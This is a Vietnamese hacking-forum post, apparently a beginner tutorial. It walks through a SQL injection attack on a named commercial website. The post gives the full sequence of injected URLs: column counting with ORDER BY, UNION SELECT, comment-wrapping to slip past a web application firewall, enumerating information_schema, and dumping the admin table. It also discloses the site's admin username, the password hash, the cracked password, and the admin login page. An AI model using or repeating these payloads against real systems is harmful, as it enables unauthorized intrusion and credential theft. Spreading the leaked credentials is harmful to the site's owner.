Admin
Well-Known Member
Staff member
Administrator
Link lỗi:
check lỗi thì ai cũng biết:
--> you have error in sql syntax ...blah blah blah
xóa dấu ' rồi order by đếm field thôi
bình thường
....
Unknown column '9' in 'order clause'
OK,vậy là có 8 field nhá
tìm field lỗi xem nào
bùm,406 Not Acceptable rồi,phải bypass thôi
h mình thêm /*!...*/ vô nha
ok,đã xuất hiện field lỗi
2,3,4,7,8 --> ai thích số nào thì chơi số đó nha,ở đây mình chọn đại số 2
mình thì quen chỉ check ver thôi,khỏi DB +user (pro đừng chém em)
5.1.56 -->thoải mái chiến
tiếp phần vui đây,get table nhá
group_concat là lệnh để nối cụm lại thành 1 dòng với nhau nhá (dành cho newbie chưa biết)
Lại bị 406 Not Acceptable nữa àk
tìm coi nó chặn cái gì nhá
FUNCTION nutrangh_nutrang.group_concat does not exist. Check the 'Function Name Parsing and Resolution' section in the Reference Manual
àk thì ra nó chặn group_concat
vậy mình dùng concat thôi cũng được,mặc dù nó không liên kết vào 1 dòng
Yeah,ra rồi kìa
ta chỉ cần để ý cái table "admin" thôi nhá
h có table name rồi thì tất nhiên ta phải đi tìm column name
đi hex cái "admin" ra trước đã
admin = 61646d696e
thêm vào 0x trước cái dãy hex đó nhá
ac ,lại là thằng 406 Not Acceptable đáng ghét!
àk thì ra quên bypass chỗ table_name
thêm /*!...*/ vào nha các bạn
rồi đó ,có column id,username,password
khai thác user+pass thôi là được rồi
các bạn lưu ý chỗ 0x2f nhá,2f là mã hex của dấu / thêm 0x vào để trong lúc query nó hiểu đó là mã hex thôi
nên khi coi các tut khác ,có nhiều pro sử dụng các dấu như ","(0x2c) ":"(0x3a)..v..v.. thì cũng đừng hỏi là gì mà hãy tự dịch mã hex đi nhé
àk quên mất mục đích chính ,dag khai thác mà nói nhiều quá,sr
sau khi thực hiện câu lệnh trên ta được :
adminoto/e10adc3949ba59abbe56e057f20f883e
adminoto :username của admin
e10adc3949ba59abbe56e057f20f883e : pass của admin ,decrypt md5 ra được là 123456 :| (thằng admin để pass vui tính nhỉ)
h chỉ còn tìm link admin thôi
àk quên convert hex online ở trang này nhé (dành cho newbie):
HTML:
http://nutranghuongphat.com/index.php?tab=4&subtab=26&id=141
HTML:
http://nutranghuongphat.com/index.php?tab=4&subtab=26&id=141'xóa dấu ' rồi order by đếm field thôi
HTML:
http://nutranghuongphat.com/index.php?tab=4&subtab=26&id=141 order by 1--....
HTML:
http://nutranghuongphat.com/index.php?tab=4&subtab=26&id=141 order by 9--OK,vậy là có 8 field nhá
tìm field lỗi xem nào
HTML:
http://nutranghuongphat.com/index.php?tab=4&subtab=26&id=141 union select 1,2,3,4,5,6,7,8--h mình thêm /*!...*/ vô nha
HTML:
http://nutranghuongphat.com/index.php?tab=4&subtab=26&id=141 /*!union*/ /*!select*/ 1,2,3,4,5,6,7,8--2,3,4,7,8 --> ai thích số nào thì chơi số đó nha,ở đây mình chọn đại số 2
mình thì quen chỉ check ver thôi,khỏi DB +user (pro đừng chém em)
HTML:
http://nutranghuongphat.com/index.php?tab=4&subtab=26&id=141 /*!union*/ /*!select*/ 1,version(),3,4,5,6,7,8--tiếp phần vui đây,get table nhá
HTML:
http://nutranghuongphat.com/index.php?tab=4&subtab=26&id=141 /*!union*/ /*!select*/ 1,group_concat(table_name),3,4,5,6,7,8 from information_schema.tables where table_schema=database()--Lại bị 406 Not Acceptable nữa àk
tìm coi nó chặn cái gì nhá
HTML:
http://nutranghuongphat.com/index.php?tab=4&subtab=26&id=141 /*!union*/ /*!select*/ 1,/*!group_concat*/(/*!table_name*/),3,4,5,6,7,8 from information_schema./*!tables*/ where table_schema=database()--àk thì ra nó chặn group_concat
vậy mình dùng concat thôi cũng được,mặc dù nó không liên kết vào 1 dòng
HTML:
http://nutranghuongphat.com/index.php?tab=4&subtab=26&id=141 /*!union*/ /*!select*/ 1,concat(/*!table_name*/),3,4,5,6,7,8 from information_schema./*!tables*/ where table_schema=database()--ta chỉ cần để ý cái table "admin" thôi nhá
h có table name rồi thì tất nhiên ta phải đi tìm column name
đi hex cái "admin" ra trước đã
admin = 61646d696e
thêm vào 0x trước cái dãy hex đó nhá
HTML:
http://nutranghuongphat.com/index.php?tab=4&subtab=26&id=141 /*!union*/ /*!select*/ 1,concat(/*!column_name*/),3,4,5,6,7,8 from information_schema./*!columns*/ where table_name=0x61646d696e--àk thì ra quên bypass chỗ table_name
thêm /*!...*/ vào nha các bạn
HTML:
http://nutranghuongphat.com/index.php?tab=4&subtab=26&id=141 /*!union*/ /*!select*/ 1,concat(/*!column_name*/),3,4,5,6,7,8 from information_schema./*!columns*/ where /*!table_name*/=0x61646d696e--khai thác user+pass thôi là được rồi
HTML:
http://nutranghuongphat.com/index.php?tab=4&subtab=26&id=141 /*!union*/ /*!select*/ 1,concat(/*!username,0x2f,password*/),3,4,5,6,7,8 from admin--nên khi coi các tut khác ,có nhiều pro sử dụng các dấu như ","(0x2c) ":"(0x3a)..v..v.. thì cũng đừng hỏi là gì mà hãy tự dịch mã hex đi nhé
àk quên mất mục đích chính ,dag khai thác mà nói nhiều quá,sr
sau khi thực hiện câu lệnh trên ta được :
adminoto/e10adc3949ba59abbe56e057f20f883e
adminoto :username của admin
e10adc3949ba59abbe56e057f20f883e : pass của admin ,decrypt md5 ra được là 123456 :| (thằng admin để pass vui tính nhỉ)
h chỉ còn tìm link admin thôi
HTML:
http://nutranghuongphat.com/admin/login.phpàk quên convert hex online ở trang này nhé (dành cho newbie):
HTML:
http://www.string-functions.com/string-hex.aspx
